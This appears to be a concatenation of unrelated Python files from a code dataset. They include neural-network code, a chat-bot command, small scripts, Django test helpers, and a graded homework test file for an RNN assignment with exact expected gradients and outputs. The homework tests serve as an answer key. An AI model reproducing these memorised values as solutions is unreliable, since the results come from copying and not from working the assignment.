matrix: m*n\n # index parent: is the that layer index child_parent dictionary\n # h_mat: the corresponding layer H_hat matrix\n # b_intercept: the corresponding layer intercept vector\n\n regr = linear_model.LinearRegression()\n\n # sample = np.shape(x)[1]\n node_number = np.shape(x)[0]\n\n #epsilon = np.zeros((node,sample))\n #ancestryisnull = []\n #for i in range(len(idp)):\n # if idp[i] == []:\n # ancestryisnull.append(i)\n #for i in ancestryisnull:\n # x[node + i] = x[i]'''\n\n # i is the node index\n for i in range(len(i_p)):\n # if node doesn't have parent\n if i_p[i] == []:\n # Just set the h_mat diagonal is 1\n h_mat[node_number + i][i] = 1\n b_intercept[node_number + i] = 0\n # For node i; j is the index of its parent\n for j in range(len(i_p[i])):\n parent_list = i_p[i]\n current_list = np.array([i])\n # a: parent node list\n # b: current node list\n a = x[parent_list][:]\n b = x[current_list][:]\n a = a.reshape((np.shape(a)[1], np.shape(a)[0]))\n b = b.reshape((np.shape(b)[1], np.shape(b)[0]))\n # method expand [x] -> [x, epsilon]\n if self.residual_set==True:\n regr.fit(a, b) # (x, y)\n # residues: b - regr.predict(a); regr.coef_; regr.intercept_\n # Since next following operation is X-x_hat,\n # So the corresponding coefficient will be negative\n h_mat[node_number + i][i_p[i]] = -regr.coef_\n b_intercept[node_number + i] = -regr.intercept_\n elif self.residual_set==False:\n h_mat[node_number + i][i_p[i]] = 1\n b_intercept[node_number + i] = 0\n\n x_epsilon = np.dot(h_mat, x) + b_intercept\n return x_epsilon, h_mat, b_intercept\n\n def loss_derivative(self, output_activation, y):\n return (output_activation - y)\n\n def w_assign_zero(self, weights, nabla_w):\n \"\"\"return add weighted matrix\"\"\"\n for a, b in zip(self.weights, nabla_w):\n for i in range(np.shape(a)[0]):\n for j in range(np.shape(a)[1]):\n if a[i][j] == 0:\n b[i][j] = 0\n return nabla_w\n\n def evaluate(self, mini_batch):\n # calculate loss\n x, y = np.transpose(mini_batch[0]), np.transpose(mini_batch[1])\n mse = self.feed_forward(x, y)\n return mse\n\n def sigmoid(self, z):\n return np.tanh(z)\n\n def sigmoid_prime(self, z):\n return 1.0 - np.tanh(z) ** 2\n\n def load_checkpoint(self, checkpoint_path):\n # It's weird that if `map_location` is not given, it will be extremely slow.\n return torch.load(checkpoint_path, map_location=lambda storage, loc: storage)\n\n def test_main(self, test_data, loss_validation, sizes, optimal_epoch_given, LOAD_CHECKPOINT = True):\n # return test loss\n\n # Select the best parameters in the model\n if optimal_epoch_given == False:\n optimal_epoch = loss_validation.index(min(loss_validation))+1\n else:\n optimal_epoch = optimal_epoch_given\n\n if LOAD_CHECKPOINT:\n # load from path.\n checkpoint_path = os.path.join('model_checkpoint_train/', \"SDL_epoch_%d.pt\" % optimal_epoch)\n checkpoint = self.load_checkpoint(checkpoint_path)\n\n # load needed parameters\n w_hat = checkpoint['w']\n b_hat = checkpoint['biases']\n epoch = checkpoint['epoch']\n lr = checkpoint['learning_rate']\n\n # Organize data\n test_data = self.data_organize(list(test_data))\n\n # Predict test results\n true_y, predict_y, loss_test = self.test_prediction(test_data, w_hat, b_hat, sizes)\n\n m = test_data[0].shape[1]\n n = test_data[0].shape[0]\n\n if not os.path.exists('model_checkpoint_test'):\n os.makedirs('model_checkpoint_test')\n\n # Check points\n testing_checkpoint = {\n 'weight': w_hat,\n 'biases': b_hat,\n 'learning_rate': lr,\n 'sizes': sizes,\n 'optimal_epoch': optimal_epoch,\n 'test_loss': loss_test,\n 'true_y': true_y,\n 'predict_y': predict_y,\n 'm': m,\n 'n': n\n }\n\n testing_model_name = '%s%d_%s%d_%s%d%s' % (\n 'model_checkpoint_test/SDL_test_m_', m,\n 'n_', n,\n 'optimal_', optimal_epoch,\n '.pt'\n )\n\n # Need change the name of saving the model parameter name\n torch.save(testing_checkpoint, testing_model_name)\n print('Optimal epoch: %d' % optimal_epoch)\n print('Test loss: %.4f\\n' % loss_test)\n return loss_test\n else:\n print('Need checkpoint, please try again!')\n\n def test_prediction(self, test_data, w_hat, b_hat, sizes):\n # Return y, predict_y, and loss of test data\n true_y, predict_y, loss_test = self.test_feed_forward(np.transpose(test_data[0]), np.transpose(test_data[1]),w_hat, b_hat, sizes)\n return true_y, predict_y, loss_test\n\n def test_feed_forward(self, x, y, w_hat, b_hat, sizes):\n\n # For layer 0\n i = 0\n # Initialization the linear part coefficients\n h_hat, b_intercept = self.h_matrix_init(sizes)\n\n # For layer i\n for b, w in zip(b_hat[:-1], w_hat[:-1]):\n # Calculate x_s\n x_s, h_hat[i], b_intercept[i] = self.epsilon_gen(\n x, self.index_parent[i], h_hat[i], b_intercept[i])\n x = self.sigmoid(np.dot(w, x_s) + b)\n i += 1\n\n # For layer L\n x_s, h_hat[-1], b_intercept[-1] = self.epsilon_gen(\n x, self.index_parent[-1], h_hat[-1], b_intercept[-1])\n\n # Get the final predict\n y_hat = np.dot(w_hat[-1], x_s) + b_hat[-1]\n\n mse = np.sum((y_hat - y) ** 2)/y.shape[1]\n\n return y, y_hat, np.array([mse])\n\n # def sigmoid(z):\n # return 1.0/(1.0+np.exp(-z))\n\n # def sigmoid_prime(z):\n # return sigmoid(z)*(1-sigmoid(z))\n\n","sub_path":"module_sdl.py","file_name":"module_sdl.py","file_ext":"py","file_size_in_byte":27659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20767868","text":"from ...objects import dp, MySignalEvent, SignalEvent\r\nfrom ...utils import edit_message, new_message\r\nfrom datetime import datetime\r\nfrom idm import __version__\r\nfrom ..my_signals.auto_friends_add import afa_thread\r\nfrom ..my_signals.online import online_thread\r\nfrom threading import Thread\r\n\r\n\r\n@dp.signal_event_handle('инфо', 'инфа', '-i', 'info')\r\ndef sinfo(event: SignalEvent) -> str:\r\n\r\n def is_alive(th: Thread) -> bool:\r\n if th == None:return False\r\n if not th.is_alive():return False\r\n return True\r\n\r\n if event.msg['from_id'] not in event.db.trusted_users:\r\n return \"ok\"\r\n\r\n owner = event.api('users.get', user_ids=event.db.owner_id)[0]\r\n\r\n\r\n message = f\"\"\"============ИНФО============\r\n\r\n Владеет Дежурным: [id{owner['id']}|{owner['first_name']} {owner['last_name']}]🥵\r\n Кол-во чатов:[{len(event.db.chats.keys())}]\r\n Ирис чат ID: [{event.chat.iris_id}]\r\n Имя беседы: [{event.chat.name}]\r\n\r\n =======ВЕЧНЫЙ ОНЛАЙН=======\r\n Выключен\r\n ==============================\r\n\r\n\r\n \"\"\".replace(' ', ' ')\r\n new_message(event.api, event.chat.peer_id, message=message)\r\n return \"ok\"","sub_path":"idm/commands/signals/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"374329579","text":"\"\"\"HACS Sensor Test Suite.\"\"\"\n# pylint: disable=missing-docstring\nimport pytest\nfrom custom_components.hacs.sensor import HACSSensor\n\n\ndef test_sensor_data():\n sensor = HACSSensor()\n assert sensor.name == \"hacs\"\n assert sensor.device_state_attributes\n\n\n@pytest.mark.asyncio\nasync def test_sensor_update():\n sensor = HACSSensor()\n dummy_state = \"DUMMY\"\n sensor._state = dummy_state # pylint: disable=protected-access\n assert sensor.state == dummy_state\n await sensor.async_update()\n assert sensor.state == 0\n","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"186989179","text":"from problem3 import *\nimport sys\nimport math\nimport torch as th\nfrom torch.utils.data import Dataset, DataLoader\n'''\n Unit test 3:\n This file includes unit tests for problem3.py.\n'''\n\n#-------------------------------------------------------------------------\ndef test_python_version():\n ''' ----------- Problem 3 (20 points in total)---------------------'''\n assert sys.version_info[0]==3 # require python 3.6 or above \n assert sys.version_info[1]>=6\n\n#---------------------------------------------------\ndef test_compute_zt():\n ''' (2 points) compute_zt'''\n # 2 time sequences of 3 input features at the current time step t \n # n = 2, p = 3 \n xt = th.tensor([\n #---------- the first time sequence in the mini-batch at time step t ------\n [0.2,0.4,0.6],\n #---------- the second time sequence in the mini-batch at time step t ------\n [0.3,0.6,0.9],\n ])\n # hidden states of 2 neurons after the previous step t-1\n # h = 2\n ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch\n [-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch\n requires_grad=True) \n U = th.tensor([[1.,2.],\n [3.,4.],\n [5.,6.]],\n requires_grad=True) \n V = th.tensor([[1.,-2.],\n [3.,-4.]],\n requires_grad=True) \n b_h = th.tensor([1., # bias for the first hidden state\n -1.], # bias for the second hidden state\n requires_grad=True)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n # check if the values are correct\n assert type(zt) == th.Tensor \n assert np.allclose(zt.size(),(2,2))\n zt_true= [[4.7, 5.2],\n [9.1, 5.6]]\n assert np.allclose(zt.data,zt_true, atol = 0.1)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in z)\n L = zt.sum()\n # back propagation\n L.backward()\n # the gradient for ht_1\n dL_dh_t_1 = [[-1., -1.],\n [-1., -1.]] \n dL_dU = [[0.5, 0.5],\n [1.0, 1.0],\n [1.5, 1.5]]\n dL_dV = [[0.2, 0.2],\n [0.2, 0.2]]\n assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.1)\n assert np.allclose(U.grad, dL_dU, atol= 0.1)\n assert np.allclose(V.grad, dL_dV, atol= 0.1)\n assert np.allclose(b_h.grad, [2,2], atol= 0.1)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n xt = th.randn(n,p)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n ht_1 = th.randn(n,h)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n assert np.allclose(zt.size(),(n,h))\n#---------------------------------------------------\ndef test_compute_ht():\n ''' (2 points) compute_ht'''\n # 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)\n # n = 2, h = 3 \n zt = th.tensor([\n #---------- the hidden states for the first time sequence in the mini-batch at time step t ------\n [0.0, 0.2, 1000.],\n #---------- the hidden states for the second time sequence in the mini-batch at time step t ------\n [0.5,-0.2,-1000.],\n ], requires_grad=True)\n ht = compute_ht(zt)\n assert type(ht) == th.Tensor \n ht_true =[[ 0.0000, 0.1974, 1.],\n [ 0.4621, -0.1974, -1.]]\n assert np.allclose(ht.data,ht_true,atol=1e-2)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = ht.sum()\n # back propagation\n L.backward()\n # the gradient for zt\n dL_dz_t = [[1.0000, 0.961, 0.],\n [0.7864, 0.961, 0.]]\n assert np.allclose(zt.grad, dL_dz_t, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n zt = th.randn(n,h)\n ht = compute_ht(zt)\n assert np.allclose(ht.size(),(n,h))\n#---------------------------------------------------\ndef test_step():\n ''' (2 points) step'''\n # 2 time sequences of 3 input features at the current time step t \n # n = 2, p = 3 \n xt = th.tensor([\n #---------- the first time sequence in the mini-batch at time step t ------\n [0.2,0.4,0.6],\n #---------- the second time sequence in the mini-batch at time step t ------\n [0.3,0.6,0.9],\n ])\n U = th.tensor([[ 0.1,-0.2],\n [-0.3, 0.4],\n [ 0.5,-0.6]],\n requires_grad=True) \n V = th.tensor([[0.1,-0.2],\n [0.3,-0.4]],\n requires_grad=True) \n b_h = th.tensor([0.2,-0.2], requires_grad=True)\n # hidden states of 2 neurons after the previous step t-1\n # h = 2\n ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch\n [-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch\n requires_grad=True) \n ht = step(xt,ht_1,U,V,b_h) \n # check if the values are correct\n assert type(ht) == th.Tensor \n assert np.allclose(ht.size(),(2,2))\n ht_true= [[ 0.3185, -0.3627],\n [ 0.5717, -0.6291]]\n assert np.allclose(ht.data,ht_true, atol = 0.1)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in ht)\n L = ht.sum()\n # back propagation\n L.backward()\n # the gradient for ht_1\n dL_dh_t_1 = [[-0.0838, -0.0778],\n [-0.0535, -0.0397]] \n dL_dU = [[0.3817, 0.3549],\n [0.7633, 0.7099],\n [1.1450, 1.0648]]\n dL_dV = [[0.2473, 0.2530],\n [0.0445, 0.0151]]\n dL_db_h = [1.5717, 1.4726]\n assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.01)\n assert np.allclose(U.grad, dL_dU, atol= 0.01)\n assert np.allclose(V.grad, dL_dV, atol= 0.01)\n assert np.allclose(b_h.grad, dL_db_h, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n xt = th.randn(n,p)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n ht_1 = th.randn(n,h)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n assert np.allclose(zt.size(),(n,h)) \n#---------------------------------------------------\ndef test_compute_z():\n ''' (2 points) compute_z'''\n # 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)\n # n = 2, c = 3 \n ht = th.tensor([\n #---------- the hidden states for the first time sequence in the mini-batch at the last time step t ------\n [0.0, 0.2, 1.],\n #---------- the hidden states for the second time sequence in the mini-batch at the last time step t ------\n [0.5,-0.2,-1.],\n ], requires_grad=True)\n W = th.tensor([1., 2., -3.], requires_grad=True)\n b = th.tensor(1., requires_grad=True)\n z = compute_z(ht,W,b)\n assert type(z) == th.Tensor \n assert np.allclose(z.size(),(2,))\n assert np.allclose(z.data,[-1.6, 4.1],atol=1e-2)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = z.sum()\n # back propagation\n L.backward()\n # the gradient for zt\n dL_dh_t = [[ 1., 2., -3.],\n [ 1., 2., -3.]]\n assert np.allclose(ht.grad, dL_dh_t, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n ht = th.randn(n,h)\n W = th.randn(h) \n b = th.randn(1) \n z = compute_z(ht,W,b)\n assert np.allclose(z.size(),(n,))\n#---------------------------------------------------\ndef test_forward():\n ''' (2 points) forward'''\n \n # 2 time sequences of 3 time steps with 2 input features at each time step \n # n = 2, l=3 p = 2\n x = th.tensor([\n #---------- the first time sequence in the mini-batch ------\n [\n [1.,0.], # the first time step of the time sequence\n [0.,1.], # the second time step of the time sequence\n [1.,0.] # the third time step of the time sequence\n ],\n #---------- the second time sequence in the mini-batch ------\n [\n [1.,0.], # the first time step of the time sequence\n [1.,0.], # the second time step of the time sequence\n [0.,1.] # the third time step of the time sequence\n ]\n #------------------------------------------------------------\n ])\n #---------------------------\n # Layer 1: Recurrent layer\n #---------------------------\n # 4 hidden states \n # h = 4 (p=2)\n U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],\n [-1.1,-1.2,-2.3,-2.4]],\n requires_grad=True) \n V = th.tensor([[0.0,-1.0, 0.0, 0.0],\n [0.0, 0.0,-1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n [0.0, 0.0, 0.0, 0.0]],\n requires_grad=True) \n b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)\n # initial hidden states of 4 neurons on 2 time sequences \n ht = th.zeros(2,4, requires_grad=True) \n #---------------------------\n # Layer 2: Fully-connected layer\n #---------------------------\n W = th.tensor([-1., 1., -1., 1.], requires_grad=True)\n b = th.tensor(0., requires_grad=True)\n z = forward(x,ht,U,V,b_h,W,b)\n assert type(z) == th.Tensor \n assert np.allclose(z.size(),(2,))\n assert np.allclose(z.data,[-0.0587, -0.0352], atol=1e-2)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = z.sum()\n # back propagation\n L.backward()\n # the gradient for the parameters\n dL_dW = [ 0.1304, 0.0279, -0.0007, 0.0078]\n dL_db = 2.\n dL_dU = [[-0.0752, 0.0067, 0.0502, 0.1800],\n [-0.3073, 0.0629, -0.0049, 0.1941]]\n dL_dV = [[-0.2416, 0.0556, 0.0563, 0.0371],\n [-0.2038, 0.0488, 0.0588, -0.0052],\n [-0.1922, 0.0467, 0.0589, -0.0166],\n [-0.2497, 0.0576, 0.0577, 0.0375]]\n dL_dbh = [-0.3825, 0.0695, 0.0453, 0.3740]\n assert np.allclose(W.grad, dL_dW, atol= 0.01)\n assert np.allclose(b.grad, dL_db, atol= 0.01)\n assert np.allclose(U.grad, dL_dU, atol= 0.01)\n assert np.allclose(V.grad, dL_dV, atol= 0.01)\n assert np.allclose(b_h.grad, dL_dbh, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n l = np.random.randint(2,10) # number of time steps in a sequence \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n x = th.randn(n,l,p)\n ht = th.randn(n,h)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n W = th.randn(h) \n b = th.randn(1) \n z = forward(x,ht,U,V,b_h,W,b)\n assert np.allclose(z.size(),(n,))\n#---------------------------------------------------\ndef test_compute_L():\n ''' (2 points) compute_L'''\n # batch_size = 4\n # linear logits in a mini-batch\n z = th.tensor([1.,-1., -1000, 1000.], requires_grad=True) \n # the labels of the mini-batch: vector of length 4 (batch_size)\n y = th.Tensor([0,1,0,1])\n L = compute_L(z,y)\n assert type(L) == th.Tensor \n assert L.requires_grad\n assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4) \n # check if the gradients of z is connected to L correctly\n L.backward() # back propagate gradient to W and b\n dL_dz_true = [ 0.1828, -0.1828, 0., 0.]\n assert np.allclose(z.grad,dL_dz_true, atol=0.01)\n #----------------------------------------- \n # batch_size = 2\n # linear logits in a mini-batch\n z = th.tensor([-1000., 1000.], requires_grad=True) \n y = th.Tensor([1,0])\n L = compute_L(z,y)\n assert L.data >100\n assert L.data < float('inf')\n L.backward() # back propagate gradient to W and b\n assert z.grad[0]<0\n assert z.grad[1]>0\n#---------------------------------------------------\ndef test_update_parameters():\n ''' (2 points) update_parameters'''\n #---------------------------\n # Layer 1: Recurrent layer\n #---------------------------\n # 4 hidden states \n # h = 4 (p=2)\n U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],\n [-1.1,-1.2,-2.3,-2.4]],\n requires_grad=True) \n V = th.tensor([[1.0,-1.0, 0.0, 0.0],\n [1.0, 0.0,-1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 0.0]],\n requires_grad=True) \n b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)\n #---------------------------\n # Layer 2: Fully-connected layer\n #---------------------------\n W = th.tensor([-1., 1., -1., 1.], requires_grad=True)\n b = th.tensor(0., requires_grad=True)\n # create a toy loss function: the sum of all elements in all parameters \n L = W.sum()+ b + U.sum() + V.sum() + b_h.sum() \n # back propagation to compute the gradients\n L.backward()\n # now the gradients for all parameters should be all-ones\n # let's try updating the parameters with gradient descent\n # create an optimizer for the parameters with learning rate = 0.1\n optimizer = th.optim.SGD([U,V,b_h,W,b], lr=0.1)\n # now perform gradient descent using SGD\n update_parameters(optimizer)\n # let's check the new values of the parameters \n U_new = [[ 2.0, 2.1, 2.2, 2.3],\n [-1.2, -1.3, -2.4, -2.5]]\n V_new = [[ 0.9, -1.1, -0.1, -0.1],\n [ 0.9, -0.1, -1.1, -0.1],\n [ 0.9, -0.1, -0.1, 0.9],\n [ 0.9, -0.1, -0.1, -0.1]]\n b_h_new = [-0.2, 0.0, -0.2, 0.0]\n W_new = [-1.1, 0.9, -1.1, 0.9]\n assert np.allclose(U.data,U_new,atol=1e-2) \n assert np.allclose(V.data,V_new,atol=1e-2) \n assert np.allclose(b_h.data,b_h_new,atol=1e-2) \n assert np.allclose(W.data,W_new,atol=1e-2) \n assert np.allclose(b.data,-0.1,atol=1e-2) \n assert np.allclose(U.grad,np.zeros((2,4)),atol=1e-2) \n assert np.allclose(V.grad,np.zeros((4,4)),atol=1e-2) \n assert np.allclose(b_h.grad,np.zeros(4),atol=1e-2) \n assert np.allclose(W.grad,np.zeros(4),atol=1e-2) \n assert np.allclose(b.grad,0,atol=1e-2) \n#---------------------------------------------------\ndef test_train():\n ''' (4 points) train'''\n # n = 4, l=3, p = 2 \n X = [\n [ # instance 0\n [0.,0.], # time step 0 \n [0.,0.], # time step 1\n [0.,0.] # time step 2\n ], \n [ # instance 1\n [0.,0.], \n [0.,0.], \n [0.,1.]\n ],\n [ # instance 2\n [0.,0.], \n [1.,0.], \n [0.,0.]\n ],\n [ # instance 3\n [0.,1.], \n [0.,0.], \n [0.,0.]\n ] \n ]\n Y = [0,0,1,1]\n class toy(Dataset):\n def __init__(self):\n self.X = th.Tensor(X) \n self.Y = th.Tensor(Y)\n def __len__(self):\n return 4 \n def __getitem__(self, idx):\n return self.X[idx], self.Y[idx]\n d = toy()\n h=32\n n=2\n loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)\n U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=100)\n ht = th.zeros(4,h) # initialize the hidden states as all zero\n z = forward(th.Tensor(X),ht,U,V,b_h,W,b)\n assert z[0] < z[2]\n assert z[1] < z[2]\n assert z[0] < z[3]\n assert z[1] < z[3]\n#---------------------------------------------------\ndef test_predict():\n ''' (2 points) predict'''\n \n # n = 4, l=3, p = 2 \n X = [\n [ # instance 0\n [0.,0.], # time step 0 \n [0.,0.], # time step 1\n [0.,0.] # time step 2\n ], \n [ # instance 1\n [0.,0.], \n [0.,0.], \n [0.,1.]\n ],\n [ # instance 2\n [0.,0.], \n [1.,0.], \n [0.,0.]\n ],\n [ # instance 3\n [0.,1.], \n [0.,0.], \n [0.,0.]\n ] \n ]\n Y = [0,0,1,1]\n class toy(Dataset):\n def __init__(self):\n self.X = th.Tensor(X) \n self.Y = th.Tensor(Y)\n def __len__(self):\n return 4 \n def __getitem__(self, idx):\n return self.X[idx], self.Y[idx]\n d = toy()\n h=32\n n=2\n loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)\n U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=300)\n y_predict = predict(th.Tensor(X),U,V,b_h,W,b)\n assert np.allclose(y_predict, Y)\n\n","sub_path":"homework3/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":17483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"582073176","text":"#DenishaRamaloo\r\n#StudentNumber:RMLDEN001\r\n\r\n#to create an empty list\r\nstrings=[]\r\n\r\n#to get a list of names\r\nstring=input(\"Enter strings (end with DONE):\\n\")\r\nwhile string !=\"DONE\":\r\n strings.append(string)\r\n string=input(\"\")\r\nx=0\r\n#arranged names to be right-aligned\r\nfor string in strings:\r\n y=len(string)\r\n if y>x:\r\n x=y\r\n#print out string \r\nprint(\"\\nRight-aligned list:\")\r\nfor string in strings:\r\n \r\n print(\" \"*(x-len(string)),string, sep=\"\")\r\n \r\n\r\n","sub_path":"examples/data/Assignment_6/rmlden001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"212426105","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/spm1d/rft1d/examples/val_max_0_gaussian_1d.py\n# Compiled at: 2019-08-22 04:37:04\n# Size of source mod 2**32: 956 bytes\nimport numpy as np\nfrom matplotlib import pyplot\nfrom spm1d import rft1d\nnp.random.seed(123456789)\nnResponses = 10000\nnNodes = 101\nFWHM = 10.0\ny = rft1d.randn1d(nResponses, nNodes, FWHM)\nymax = y.max(axis=1)\nheights = np.linspace(2, 4, 21)\nsf = np.array([(ymax > h).mean() for h in heights])\nsfE = rft1d.norm.sf(heights, nNodes, FWHM)\nsfN = rft1d.norm.sf0d(heights)\npyplot.close('all')\nax = pyplot.axes()\nax.plot(heights, sf, 'o', label='Simulated')\nax.plot(heights, sfE, '-', label='Theoretical')\nax.plot(heights, sfN, 'r-', label='Standard normal')\nax.set_xlabel('x', size=16)\nax.set_ylabel('$P (z_\\\\mathrm{max} > x)$', size=20)\nax.legend()\nax.set_title('Gaussian univariate validation (1D)', size=20)\npyplot.show()","sub_path":"pycfiles/spm1d-0.4.2-py3.6/val_max_0_gaussian_1d.cpython-36.py","file_name":"val_max_0_gaussian_1d.cpython-36.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"604519912","text":"\n\n#calss header\nclass _WAYWARD():\n\tdef __init__(self,): \n\t\tself.name = \"WAYWARD\"\n\t\tself.definitions = [u'doing only what you want and often changing your behaviour in a way that is difficult to control']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_wayward.py","file_name":"_wayward.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441133458","text":"import pubchempy as pcp\nimport asyncio\nimport json\n\n\ndef read_cid(i):\n \"\"\"\n read the cid file\n \"\"\"\n data = dict()\n with open('cid/cid_nsc_' + str(i) + '.json', 'r') as file:\n data = json.load(file)\n\n return data\n\ndef graph_downloader():\n cnt = [0]\n\n def img_downloader(cid, nsc):\n \"\"\"\n download the png image from pubchem, the naming of the image: nsc_number.png\n \"\"\"\n if(nsc != 'not_found'):\n pcp.download('PNG', 'graph/' + nsc + '.png', cid, overwrite=True)\n print(\"Item \" + str(cnt[0]) + \" is completed\")\n cnt[0] += 1\n\n for i in range(178):\n cnt = [0]\n nsc_cid = read_cid(i)\n for nsc in nsc_cid:\n img_downloader(nsc_cid[nsc], nsc)\n print(\"Crawling the file cid_nsc_{} is completed\".format(i))\n\n\nif __name__ == \"__main__\":\n graph_downloader()\n","sub_path":"graph_downloader.py","file_name":"graph_downloader.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561282227","text":"import random as rand\nimport os\nimport string\nimport unittest\n\nfrom django.contrib.sessions.middleware import SessionMiddleware\nfrom django.test import Client\nfrom django.core.wsgi import get_wsgi_application\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Alejandria.settings')\napp = get_wsgi_application()\nfrom django.test import RequestFactory\nfrom books.models import User, Address, Cart, Book, Guest, BankAccount, Bill\nimport random\nfrom books.views import delete_product, add_product, complete_purchase, generate_pdf, PaymentView\n\n\n\ndef random_char(y):\n return ''.join(random.choice(string.ascii_letters) for x in range(y))\n\n\ndef create_user(random_user=False):\n \"\"\" Test if creation of Users has any error, creating or storing the information\"\"\"\n # Data to test\n if random_user:\n _id = random.randint(0, 654891898)\n else:\n _id = 1\n role = 'Admin'\n name = 'Josep'\n if random_user:\n username = str(random.randint(0, 5156123423456015412))[:12]\n else:\n username = 'user'\n\n password = 'password1'\n email = 'fakemail@gmail.com'\n user_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n fact_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n user_address.save()\n fact_address.save()\n\n # Model creation\n obj = User(id=_id, role=role,\n username=username,\n name=name,\n password=password,\n email=email,\n user_address=user_address,\n fact_address=fact_address)\n obj.save()\n\n cart = Cart(user_id=obj)\n cart.save()\n\n return obj\n\ndef get_or_create_user():\n user_query = User.objects.filter(id=1000)\n if user_query.count() == 0:\n user_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n fact_address = Address(city='Barcelona', street='C/ Test, 112', country='Spain', zip='08942')\n user = User(id=1000, role='Admin', username='Test User Cart', name='Test',\n password='password1', email='fakemail@gmail.com', user_address=user_address,\n genre_preference_1='CRIM', genre_preference_2='FANT', genre_preference_3='KIDS',\n fact_address=fact_address)\n user_address.save()\n fact_address.save()\n user.save()\n else:\n user = user_query.first()\n return user\n\n \ndef get_or_create_guest():\n device = '123456789'\n guest_query = Guest.objects.filter(device=device)\n if guest_query.count() == 0:\n guest = Guest(device=device)\n guest.save()\n else:\n guest = guest_query.first()\n return guest\n\n\ndef get_or_create_books(user, n):\n books_query = Book.objects.filter()\n books = []\n if books_query.count() < 3:\n ISBNs = [str(i) for i in range(n)]\n titles = [random_char(5) for i in range(n)]\n for i in range(len(titles)):\n book = Book(ISBN=ISBNs[i], user_id=user, title=titles[i], description='', author='', price=30,\n language='Spanish', publisher='', num_pages=200, num_sold=100, primary_genre=\"FANT\",\n secondary_genre=\"OTHR\", recommended_age=\"Juvenil\")\n books.append(book)\n book.save()\n else:\n for b in books_query:\n books.append(b)\n return books\n\n\ndef get_or_create_guest_cart(guest):\n cart_query = Cart.objects.filter(guest_id=guest)\n if cart_query.count() == 0:\n cart = Cart(guest_id=guest)\n cart.save()\n else:\n 